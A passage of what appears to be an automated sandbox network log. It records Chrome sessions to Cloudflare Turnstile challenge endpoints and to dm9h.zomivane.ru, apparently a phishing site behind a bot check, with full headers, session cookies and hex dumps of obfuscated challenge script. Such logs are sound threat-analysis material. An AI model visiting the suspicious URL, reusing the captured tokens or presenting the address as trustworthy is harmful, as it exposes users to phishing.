                                                                                                                                                                                                                                            123192.168.2.1749842104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qvn8h/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:36 GMT
                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                            Content-Length: 61
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cache-control: max-age=2629800, public
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6b06a6fde9b-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            124192.168.2.1749832104.21.96.14435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC1320OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                            Host: dm9h.zomivane.ru
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://dm9h.zomivane.ru/oIZnEw3n/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: XSRF-TOKEN=eyJpdiI6Im1WWU12dVloRkxqWGUwaTVoa3VCV1E9PSIsInZhbHVlIjoiTUdCL0xRTXprK0F6K202cHA4enZLR3lkT1lkUEdlRmExL0RiZWtsTkp5Z1FLazVVVSthMUZKSDRyeUNKU3k3Y0p2N2ZpRFlsVEI0TFlNOUxHS1NveXpER3RaaTdoblUvRkdDQzdUamsxWkxhN00yVWFnVC9CU1M0bG9pQUpHWmoiLCJtYWMiOiIzYjg3YjE0MmZiZjYwOTk1ZjFlNjk4ZWU3ODMyOTJmYTQyYzBkMGFhODdjNDc5MzAzY2ZhNjYyNDIzYmNjNDNjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpNMFRaclpZNGhwT1RyeHkvT3Y2b1E9PSIsInZhbHVlIjoiNndBQXQzby9ESXZHTjFReHdla1dkdWovbmFUWGY0NlJJTGF3L0gybzVxZ3dOZ3lJR3dwcGZpNk5HTEF6bXNmOXlDQ1JHYnlhcVVwZkpJRVVRYlBra3JFSUFkMUViN21DVmFYeUY2YndLQURicUFCbmw0OEZHUjd4bmF2aGpUVjEiLCJtYWMiOiI1OTYzNTU3OTZkNjUyNzIxZGMxODcwNGU4NTY3NjE0NjYzNjA2MWU3MzcwYTZlNTE4ZDNmYzdhZDViOTZhNmY2IiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1058INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:37 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NTy5FmInOhUR88Lwrok3kwnPNKIH1pnWwJpPUp1Hwt3iZqhpMbqVtdAdlgfYyuBVugBTlSiEpQnm8tehb8Y6AgK8NKLJUbNdWCkk0rO%2FaR2A%2B6%2FJ63gdvNQpauEc8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3978&min_rtt=3930&rtt_var=1190&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2232&delivery_rate=684450&cwnd=251&unsent_bytes=0&cid=c0e1fc07c17549cc&ts=150&x=0"
                                                                                                                                                                                                                                            CF-Cache-Status: MISS
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6b25cf972a4-EWR
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1990&rtt_var=765&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1898&delivery_rate=1412675&cwnd=212&unsent_bytes=0&cid=2a05a259cc438393&ts=3808&x=0"
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            125192.168.2.1749843104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:37 GMT
                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                            Content-Length: 61
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cache-control: max-age=2629800, public
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6b42e8a425d-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            126192.168.2.1749844104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ffcb6abdab37d06&lang=auto HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:37 GMT
                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 124551
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6b56b9d43d5-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                                                                                                                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e
                                                                                                                                                                                                                                            Data Ascii: ore%20information%3C%2Fa%3E","turnstile_success":"Success%21","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20lon
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 2c 67 69 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 73 2c 67 74 2c 67 41 2c 67 45 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 39 36 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 33 38 29 29 2f 32 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 35 34 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 34 39 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 31 32 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 35 33 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 35 37 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28
                                                                                                                                                                                                                                            Data Ascii: ,gi,gm,gn,go,gs,gt,gA,gE,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1196))/1+parseInt(gI(638))/2*(parseInt(gI(1154))/3)+-parseInt(gI(1549))/4+-parseInt(gI(1112))/5*(-parseInt(gI(753))/6)+parseInt(gI(857))/7+parseInt(gI(
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 43 46 67 61 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 74 47 50 53 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 4e 68 6e 4b 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 48 4e 6d 5a 49 27 3a 68 6e 28 31 35 31 30 29 2c 27 70 79 6b 74 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 67 43 68 55 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 5e 68 7d 2c 27 75 4d 71 4e 74 27 3a 68 6e 28 31 32 30 32 29 2c 27 4a 4d 78 76 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                            Data Ascii: (h,i){return h<i},'CFgao':function(h,i){return i==h},'tGPSh':function(h,i){return h==i},'NhnKF':function(h,i){return h===i},'HNmZI':hn(1510),'pyktP':function(h,i){return h==i},'gChUF':function(h,i){return i^h},'uMqNt':hn(1202),'JMxva':function(h,i){return
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 38 38 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 68 73 28 31 33 37 35 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 68 73 28 39 35 30 29 5d 28 30 29 2c 78 3d 30 3b 38 3e 78 3b 49 3d 49 3c 3c 31 2e 39 31 7c 64 5b 68 73 28 36 36 35 29 5d 28 4e 2c 31 29 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 68 73 28 31 33 37 35 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 20 51 3d 74 68 69 73 2e 68 5b 74 68 69 73 2e 68 5b 73 5b 68 73 28 31 34 30 38 29 5d 28 34 39 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 73 5b 68 73 28 39 37 35 29 5d 28 74 68 69 73 2e 68 5b 73 5b 68 73 28 31 34 30 38 29 5d 28 34 39 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 68 73 28 39 35 30 29 5d
                                                                                                                                                                                                                                            Data Ascii: 88)](J,j-1)?(J=0,H[hs(1375)](o(I)),I=0):J++,x++);for(N=D[hs(950)](0),x=0;8>x;I=I<<1.91|d[hs(665)](N,1),J==j-1?(J=0,H[hs(1375)](o(I)),I=0):J++,N>>=1,x++);}else Q=this.h[this.h[s[hs(1408)](49,this.g)][3]^s[hs(975)](this.h[s[hs(1408)](49,this.g)][1][hs(950)]
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 68 73 28 39 35 30 29 5d 28 30 29 2c 78 3d 30 3b 31 36 3e 78 3b 49 3d 64 5b 68 73 28 31 30 32 32 29 5d 28 49 3c 3c 31 2e 35 37 2c 4e 26 31 29 2c 4a 3d 3d 64 5b 68 73 28 31 33 39 37 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 68 73 28 31 33 37 35 29 5d 28 64 5b 68 73 28 38 37 32 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 64 5b 68 73 28 31 33 38 30 29 5d 28 30 2c 45 29 26 26 28 45 3d 4d 61 74 68 5b 68 73 28 39 33 31 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 66 6f 72 28 4e 3d 42 5b 44 5d 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 68 73 28 31 30 32 32 29 5d 28 49 3c 3c 31 2c 31 2e 33 33 26 4e 29 2c 64 5b 68
                                                                                                                                                                                                                                            Data Ascii: N=0,x++);for(N=D[hs(950)](0),x=0;16>x;I=d[hs(1022)](I<<1.57,N&1),J==d[hs(1397)](j,1)?(J=0,H[hs(1375)](d[hs(872)](o,I)),I=0):J++,N>>=1,x++);}E--,d[hs(1380)](0,E)&&(E=Math[hs(931)](2,G),G++),delete C[D]}else for(N=B[D],x=0;x<G;I=d[hs(1022)](I<<1,1.33&N),d[h
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 68 78 28 38 37 32 29 5d 28 6f 2c 4a 2b 2b 29 29 2c 4b 7c 3d 28 30 3c 4d 3f 31 3a 30 29 2a 47 2c 47 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4b 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 68 78 28 39 33 31 29 5d 28 32 2c 38 29 2c 47 3d 31 3b 64 5b 68 78 28 31 32 32 32 29 5d 28 47 2c 4c 29 3b 4d 3d 64 5b 68 78 28 36 36 35 29 5d 28 48 2c 49 29 2c 49 3e 3e 3d 31 2c 49 3d 3d 30 26 26 28 49 3d 6a 2c 48 3d 64 5b 68 78 28 31 34 30 33 29 5d 28 6f 2c 4a 2b 2b 29 29 2c 4b 7c 3d 28 30 3c 4d 3f 31 3a 30 29 2a 47 2c 47 3c 3c 3d 31 29 3b 4e 3d 65 28 4b 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 68 78 28 39 33 31 29 5d 28 32 2c 31 36 29 2c 47 3d 31 3b 4c 21 3d 47 3b 4d 3d 49 26 48 2c 49 3e 3e 3d 31
                                                                                                                                                                                                                                            Data Ascii: hx(872)](o,J++)),K|=(0<M?1:0)*G,G<<=1);switch(K){case 0:for(K=0,L=Math[hx(931)](2,8),G=1;d[hx(1222)](G,L);M=d[hx(665)](H,I),I>>=1,I==0&&(I=j,H=d[hx(1403)](o,J++)),K|=(0<M?1:0)*G,G<<=1);N=e(K);break;case 1:for(K=0,L=Math[hx(931)](2,16),G=1;L!=G;M=I&H,I>>=1
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 2b 32 35 36 2c 32 35 35 29 2c 39 30 29 5e 74 68 69 73 2e 67 5d 2c 52 3d 50 5b 68 78 28 35 37 33 29 5d 28 29 2c 74 68 69 73 2e 68 5b 73 5b 68 78 28 31 37 38 31 29 5d 28 52 2c 74 68 69 73 2e 67 29 5d 3d 51 2c 74 68 69 73 2e 68 5b 73 5b 68 78 28 31 37 38 31 29 5d 28 31 38 31 2c 74 68 69 73 2e 67 29 5d 5b 68 78 28 31 35 38 30 29 5d 28 50 5b 68 78 28 35 37 33 29 5d 28 29 29 7d 7d 2c 67 3d 7b 7d 2c 67 5b 68 6e 28 31 30 36 36 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 65 4d 5b 67 4a 28 36 35 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 79 2c 64 2c 65 2c 66 2c 67 29 7b 68 79 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 68 79 28 31 37 37 39 29 5d 3d 68 79 28 33 30 38 29 2c 64 5b 68 79 28 31 30 35 32 29 5d 3d 68 79 28 39 31 39 29 2c 64 5b 68 79 28 31 33 31 39 29 5d 3d 68 79 28 31 35 31
                                                                                                                                                                                                                                            Data Ascii: +256,255),90)^this.g],R=P[hx(573)](),this.h[s[hx(1781)](R,this.g)]=Q,this.h[s[hx(1781)](181,this.g)][hx(1580)](P[hx(573)]())}},g={},g[hn(1066)]=f.h,g}(),eM[gJ(651)]=function(hy,d,e,f,g){hy=gJ,d={},d[hy(1779)]=hy(308),d[hy(1052)]=hy(919),d[hy(1319)]=hy(151
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 39 29 5d 2b 6c 2b 69 5b 68 41 28 32 38 36 29 5d 2b 31 2b 69 5b 68 41 28 37 38 36 29 5d 2b 65 4d 5b 68 41 28 31 30 34 38 29 5d 5b 68 41 28 31 32 35 38 29 5d 2b 27 2f 27 2c 65 4d 5b 68 41 28 31 30 34 38 29 5d 2e 63 48 29 2b 27 2f 27 2c 65 4d 5b 68 41 28 31 30 34 38 29 5d 5b 68 41 28 37 33 34 29 5d 29 2c 6e 3d 7b 7d 2c 6e 5b 68 41 28 34 35 35 29 5d 3d 65 4d 5b 68 41 28 31 30 34 38 29 5d 5b 68 41 28 34 35 35 29 5d 2c 6e 5b 68 41 28 31 30 38 37 29 5d 3d 65 4d 5b 68 41 28 31 30 34 38 29 5d 5b 68 41 28 31 30 38 37 29 5d 2c 6e 5b 68 41 28 31 37 32 36 29 5d 3d 65 4d 5b 68 41 28 31 30 34 38 29 5d 5b 68 41 28 31 37 32 36 29 5d 2c 6e 5b 68 41 28 36 31 35 29 5d 3d 65 4d 5b 68 41 28 31 30 34 38 29 5d 5b 68 41 28 39 37 32 29 5d 2c 6f 3d 6e 2c 73 3d 6e 65 77 20 65 4d 5b
                                                                                                                                                                                                                                            Data Ascii: 9)]+l+i[hA(286)]+1+i[hA(786)]+eM[hA(1048)][hA(1258)]+'/',eM[hA(1048)].cH)+'/',eM[hA(1048)][hA(734)]),n={},n[hA(455)]=eM[hA(1048)][hA(455)],n[hA(1087)]=eM[hA(1048)][hA(1087)],n[hA(1726)]=eM[hA(1048)][hA(1726)],n[hA(615)]=eM[hA(1048)][hA(972)],o=n,s=new eM[
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 39 39 38 29 5d 28 29 2c 6b 3d 69 5b 68 44 28 36 30 34 29 5d 2c 69 5b 68 44 28 31 34 31 36 29 5d 28 6a 5b 68 44 28 31 37 30 31 29 5d 28 6b 29 2c 2d 31 29 29 7b 69 66 28 68 44 28 31 31 39 35 29 3d 3d 3d 69 5b 68 44 28 38 30 31 29 5d 29 65 4d 5b 68 44 28 31 30 33 35 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 45 29 7b 68 45 3d 68 44 2c 65 4d 5b 68 45 28 36 35 31 29 5d 28 29 7d 2c 31 65 33 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 7d 65 6c 73 65 20 69 5b 68 44 28 39 33 38 29 5d 3d 3d 3d 68 44 28 37 36 35 29 3f 28 6c 3d 7b 7d 2c 6c 5b 68 44 28 34 38 33 29 5d 3d 64 2c 6c 5b 68 44 28 32 39 31 29 5d 3d 65 2c 6c 5b 68 44 28 33 31 33 29 5d 3d 66 2c 6c 5b 68 44 28 35 39 36 29 5d 3d 67 2c 6c 5b 68 44 28 36 31 30 29 5d 3d 68 2c 6d 3d 6c 2c 65 4d 5b 68 44 28 31 30 33 35 29 5d
                                                                                                                                                                                                                                            Data Ascii: 998)](),k=i[hD(604)],i[hD(1416)](j[hD(1701)](k),-1)){if(hD(1195)===i[hD(801)])eM[hD(1035)](function(hE){hE=hD,eM[hE(651)]()},1e3);else return}else i[hD(938)]===hD(765)?(l={},l[hD(483)]=d,l[hD(291)]=e,l[hD(313)]=f,l[hD(596)]=g,l[hD(610)]=h,m=l,eM[hD(1035)]


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            127192.168.2.1749845104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/688879100:1736511142:tGsU17yq18PkVnI4wKa3Ww51WTbxFUU1SF8xW7QVDR4/8ffcb6abdab37d06/ZizkGAal8K5b0bq9fQsWLsrFRcrAiFKh.Y5WJ48rebc-1736512595-1.1.1.1-7REzBxzifHwqMMjHAfCLgybYIs4UYWCpBrJIy.X6bN2QQ58Y4moZJeHrjd0eNxGu HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 3160
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            CF-Challenge: ZizkGAal8K5b0bq9fQsWLsrFRcrAiFKh.Y5WJ48rebc-1736512595-1.1.1.1-7REzBxzifHwqMMjHAfCLgybYIs4UYWCpBrJIy.X6bN2QQ58Y4moZJeHrjd0eNxGu
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
